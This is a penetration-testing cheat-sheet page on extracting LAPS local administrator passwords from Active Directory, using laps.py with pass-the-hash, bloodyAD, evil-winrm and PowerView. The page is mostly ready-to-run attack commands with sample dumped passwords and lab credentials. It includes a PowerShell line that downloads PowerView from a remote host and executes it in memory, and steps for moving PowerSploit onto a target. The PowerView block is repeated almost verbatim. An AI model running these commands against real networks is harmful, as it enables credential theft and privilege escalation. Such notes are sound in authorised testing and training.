LAPS

Dump laps passwords if you have a user account with the rights to dump the laps passwords
Enumerate users that can read the laps passwords with bloodhound

lapsdumper.py

Usage:

Basic:

$ python laps.py -u user -p password -d domain.local

Pass the Hash, specific LDAP server:

$ python laps.py -u user -p e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c -d domain.local -l dc01.domain.local

bloodyAD

If BloodHound shows the user can read LAPS passwords, query ms-Mcs-AdmPwd and ms-Mcs-AdmPwdExpirationTime directly:

bloodyAD --host DC_IP -d domain.local -u user -p 'PASSWORD' \
  get search \
  --filter '(ms-mcs-admpwdexpirationtime=*)' \
  --attr ms-mcs-admpwd,ms-mcs-admpwdexpirationtime

Example output:

distinguishedName: CN=DC01,OU=Domain Controllers,DC=domain,DC=local
ms-Mcs-AdmPwd: V,!31D;3&M+2h.
ms-Mcs-AdmPwdExpirationTime: 134260119643091883

Use the recovered local Administrator password with WinRM if the target permits it:

evil-winrm -i DC_IP -u Administrator -p 'V,!31D;3&M+2h.'

(new-object system.net.webclient).downloadstring('http://10.10.15.45/PowerView.ps1') | IEX
$SecPassword = ConvertTo-SecureString 'J5KCwKruINyCJBKd1dZU' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('RLAB\ngodfrey_adm',$SecPassword)
Get-DomainComputer ws01,ws02,ws03,ws04,ws05,ws06 -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime -Credential $Cred
Get-DomainComputer ws02 -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime -Credential $Cred

ms-mcs-admpwdexpirationtime ms-mcs-admpwd
--------------------------- -------------
ws01        133185858282921848 7Z74HKx6     
ws02        133185858955408843 Khb3SL8p     
ws03        133185859531299786 t25KAW60     
ws04        133185860137129767 l0Q7i5Xd     
ws05        133185860845564372 bzsn82zX     
ws06        133185861369786402 vPKNz69a

Powerview Dump

Download Powersploit

https://github.com/PowerShellMafia/PowerSploit/tree/dev

zip the dir up and transfer the whole thing to target
expand on target with expand-archive

import-module .\PowerSploit.psd1
--or--
(new-object system.net.webclient).downloadstring('http://10.10.15.45/PowerView.ps1') | IEX
#now it is loaded into mem either with IEX or with the import-module
$SecPassword = ConvertTo-SecureString 'PASSWORD_HERE' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('RLAB\ngodfrey_adm',$SecPassword)
Get-DomainComputer ws01,ws02,ws03,ws04,ws05,ws06 -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime -Credential $Cred
Get-DomainComputer ws02 -Properties ms-mcs-AdmPwd,ComputerName,ms-mcs-AdmPwdExpirationTime -Credential $Cred

ms-mcs-admpwdexpirationtime ms-mcs-admpwd
--------------------------- -------------
ws01        133185858282921848 7Z74HKx6     
ws02        133185858955408843 Khb3SL8p     
ws03        133185859531299786 t25KAW60     
ws04        133185860137129767 l0Q7i5Xd     
ws05        133185860845564372 bzsn82zX     
ws06        133185861369786402 vPKNz69a

PreviousOverpass The Hash/Pass The Key (PTK)NextPass the Ticket - Linux

Last updated 21 days ago